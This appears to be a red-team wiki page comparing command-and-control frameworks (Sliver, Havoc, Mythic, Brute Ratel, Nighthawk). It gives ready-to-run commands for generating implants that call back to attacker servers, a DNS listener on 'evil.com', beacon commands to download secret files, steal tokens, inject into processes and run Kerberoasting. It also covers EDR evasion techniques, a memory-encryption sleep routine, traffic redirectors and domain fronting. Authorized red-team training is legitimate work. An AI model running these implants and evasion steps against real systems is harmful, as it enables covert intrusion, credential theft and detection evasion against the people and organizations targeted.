Modern C2 Frameworks

Command and Control frameworks for red team operations (2024-2025).

Skill Level: Advanced Prerequisites: Network protocols, evasion techniques, operational security

Framework Comparison

Framework

Language

License

Evasion

Comms

Sliver

Open Source

Good

mTLS, HTTP(S), DNS, WG

Havoc

C/C++

Open Source

Excellent

HTTP(S), SMB

Mythic

Python/Go

Open Source

Good

Multiple agents

Brute Ratel

C/C++

Commercial

Excellent

HTTP(S), DNS, SMB

Nighthawk

C++

Commercial

Excellent

HTTP(S), DNS

Cobalt Strike

Java

Commercial

Good

HTTP(S), DNS, SMB

Sliver

Installation

# Download latest release
curl https://sliver.sh/install | sudo bash

# Or build from source
git clone https://github.com/BishopFox/sliver.git
cd sliver
make

# Start server
./sliver-server

Implant Generation

# Generate beacon (recommended - async)
sliver > generate beacon --http https://teamserver.com --save /tmp/beacon.exe

# Generate session (interactive)
sliver > generate --mtls teamserver.com --save /tmp/session.exe

# Linux implant
sliver > generate beacon --http https://teamserver.com --os linux --arch amd64

# macOS
sliver > generate beacon --http https://teamserver.com --os darwin --arch amd64

# Staged payload (smaller)
sliver > generate stager --lhost teamserver.com --lport 8443 --protocol http

# Shellcode output
sliver > generate beacon --http https://teamserver.com --format shellcode

Listeners

# HTTPS listener
sliver > https --lhost 0.0.0.0 --lport 443 --domain legitimate.com

# mTLS listener
sliver > mtls --lhost 0.0.0.0 --lport 8888

# DNS listener
sliver > dns --domains evil.com --lport 53

# WireGuard listener
sliver > wg --lport 51820

Operations

# List sessions/beacons
sliver > sessions
sliver > beacons

# Interact with beacon
sliver > use <BEACON_ID>

# Execute commands
sliver (BEACON) > shell
sliver (BEACON) > execute -o whoami

# File operations
sliver (BEACON) > download C:\\Users\\admin\\Desktop\\secrets.txt
sliver (BEACON) > upload /tmp/tool.exe C:\\Windows\\Temp\\tool.exe

# Process operations
sliver (BEACON) > ps
sliver (BEACON) > migrate <PID>

# Pivoting
sliver (BEACON) > pivots tcp --bind 0.0.0.0:1234

# Built-in tools
sliver (BEACON) > seatbelt
sliver (BEACON) > sharpup

Evasion Features

# Obfuscation during generation
sliver > generate beacon --http https://ts.com --skip-symbols --debug

# Process injection
sliver (BEACON) > execute-assembly /path/to/tool.exe

# In-memory .NET execution
sliver (BEACON) > execute-assembly /path/to/Rubeus.exe kerberoast

Havoc

Installation

# Clone repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc

# Build teamserver
cd teamserver
go build -o teamserver cmd/server/main.go

# Build client
cd ../client
mkdir build && cd build
cmake ..
make

# Start teamserver
./teamserver server --profile profiles/havoc.yaotl

Demon Generation

# Via GUI or profile
# Havoc uses "Demons" as implants

# Profile example (havoc.yaotl)
Demon {
    Sleep: 5
    Jitter: 20
    
    Injection {
        Spawn64: "C:\\Windows\\System32\\notepad.exe"
        Spawn32: "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Features

Key Havoc capabilities:
- Indirect syscalls
- Hardware breakpoint hooks
- Sleep obfuscation
- Return address spoofing
- Module stomping
- BOF (Beacon Object Files) support
- Token manipulation

Operations

# In Havoc GUI:
# Interact with Demon
# Right-click → Interact

# Execute commands
shell whoami

# Load BOF
inline-execute /path/to/bof.o args

# Process injection
inject <PID> shellcode

# Token operations  
token list
token steal <PID>
token make <user> <pass>

Mythic

Installation

# Clone repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic

# Install
./mythic-cli install github https://github.com/MythicAgents/Apollo.git
./mythic-cli install github https://github.com/MythicAgents/poseidon.git
./mythic-cli install github https://github.com/MythicC2Profiles/http.git

# Start
./mythic-cli start

# Access web UI
# https://localhost:7443
# Default: mythic_admin / random (check ./mythic-cli config get MYTHIC_ADMIN_PASSWORD)

Available Agents

Apollo - Windows C# agent
Poseidon - macOS/Linux Go agent
Medusa - Python agent
Merlin - Go cross-platform
Nimplant - Nim-based

Payload Generation

# Via web interface:
# 1. Payloads → Create Payload
# 2. Select Agent (Apollo, Poseidon, etc.)
# 3. Select C2 Profile (HTTP, websocket, etc.)
# 4. Configure callback settings
# 5. Build

# Apollo example:
# - C2 Profile: HTTP
# - Callback host: https://teamserver.com
# - Callback interval: 10
# - Jitter: 23%

Operations

# Mythic uses web UI primarily
# Key operations available:

File Browser - Navigate target filesystem
Process List - View/inject processes  
Shell - Execute commands
Upload/Download - File transfer
Screenshots - Capture screen
Keylog - Keylogging
SOCKS - Proxy tunneling

Brute Ratel C4 (Commercial)

Overview

Commercial framework known for:
- Exceptional EDR evasion
- Syscall-based operations
- Sleep masking
- CFG/CIG bypass
- Memory-only execution

Key Features

Badger (agent) capabilities:
- Direct/Indirect syscalls
- Hardware breakpoint hooking
- Stack spoofing
- Sleep obfuscation (encrypts memory)
- AMSI/ETW bypass
- User-defined reflective loader

Operational Concepts

# Typical workflow:
1. Configure listener (HTTP/HTTPS/DNS/SMB)
2. Generate Badger payload
3. Deploy to target
4. Interact via GUI

# Advanced features:
- Lateral movement templates
- Token manipulation
- BOF support
- LDAP integration
- Credential harvesting

Nighthawk (Commercial)

Overview

MDSec's commercial framework:
- Position-independent code
- Extensive anti-analysis
- Sleep obfuscation
- Custom memory allocator
- Multiple protocols

Features

Key capabilities:
- Syscall evasion
- Module stomping
- Sleep encryption
- Beacon object files
- Token manipulation
- Kerberos operations
- LDAP queries
- WMI/SMB lateral movement

Evasion Techniques

Common to Modern C2s

1. Sleep Obfuscation
   - Encrypt beacon memory during sleep
   - Avoid memory scanners

2. Indirect Syscalls
   - Avoid ntdll.dll hooks
   - Call syscalls directly

3. API Hashing
   - Resolve APIs at runtime
   - Avoid import table detection

4. Return Address Spoofing
   - Fake legitimate call stack
   - Bypass stack-based detection

5. Hardware Breakpoints
   - Hook without modifying code
   - Avoid hook detection

6. Module Stomping
   - Overwrite legitimate DLL memory
   - Appear as normal module

Sleep Obfuscation Example

// Concept: Encrypt beacon in memory during sleep

void sleep_obfuscated(DWORD milliseconds) {
    // 1. Save current memory state
    void* beacon_memory = get_beacon_memory();
    size_t beacon_size = get_beacon_size();
    
    // 2. Encrypt memory
    encrypt_memory(beacon_memory, beacon_size, key);
    
    // 3. Change memory permissions
    VirtualProtect(beacon_memory, beacon_size, PAGE_NOACCESS, &old);
    
    // 4. Sleep
    SleepEx(milliseconds, FALSE);
    
    // 5. Restore permissions
    VirtualProtect(beacon_memory, beacon_size, PAGE_EXECUTE_READWRITE, &old);
    
    // 6. Decrypt memory
    decrypt_memory(beacon_memory, beacon_size, key);
}

C2 Infrastructure

Redirectors

# Use redirectors to hide C2 server

# socat redirector
socat TCP4-LISTEN:80,fork TCP4:c2server.internal:80

# iptables redirector
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination C2_IP:80

# Apache mod_rewrite
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/api/v1/.*
RewriteRule ^(.*)$ https://c2server.internal$1 [P]

Domain Fronting

Use CDN to mask C2 traffic:
1. SNI shows: legitimate.cloudfront.net
2. Host header: c2.cloudfront.net
3. CDN routes based on Host header
4. Network sees legitimate CDN traffic

Malleable Profiles

Customize C2 traffic to mimic legitimate applications:
- User-agent strings
- URI patterns
- Request/response headers
- Body encoding
- Jitter and sleep intervals

RT/EDR Evasion - Evasion techniques
Windows Post-Exploitation - Windows operations
Reverse Shells - Initial access

PreviousLinux Kernel Exploits NextLinux

Last updated 8 days ago

Was this helpful?

hashtagFramework Comparison

hashtagSliver

hashtagInstallation

hashtagImplant Generation

hashtagListeners

hashtagOperations

hashtagEvasion Features

hashtagHavoc

hashtagInstallation

hashtagDemon Generation

hashtagFeatures

hashtagOperations

hashtagMythic

hashtagInstallation

hashtagAvailable Agents

hashtagPayload Generation

hashtagOperations

hashtagBrute Ratel C4 (Commercial)

hashtagOverview

hashtagKey Features

hashtagOperational Concepts

hashtagNighthawk (Commercial)

hashtagOverview

hashtagFeatures

hashtagEvasion Techniques

hashtagCommon to Modern C2s

hashtagSleep Obfuscation Example

hashtagC2 Infrastructure

hashtagRedirectors

hashtagDomain Fronting

hashtagMalleable Profiles

hashtagRelated Topics

Framework Comparison

Sliver

Installation

Implant Generation

Listeners

Operations

Evasion Features

Havoc

Installation

Demon Generation

Features

Operations

Mythic

Installation

Available Agents

Payload Generation

Operations

Brute Ratel C4 (Commercial)

Overview

Key Features

Operational Concepts

Nighthawk (Commercial)

Overview

Features

Evasion Techniques

Common to Modern C2s

Sleep Obfuscation Example

C2 Infrastructure

Redirectors

Domain Fronting

Malleable Profiles

Related Topics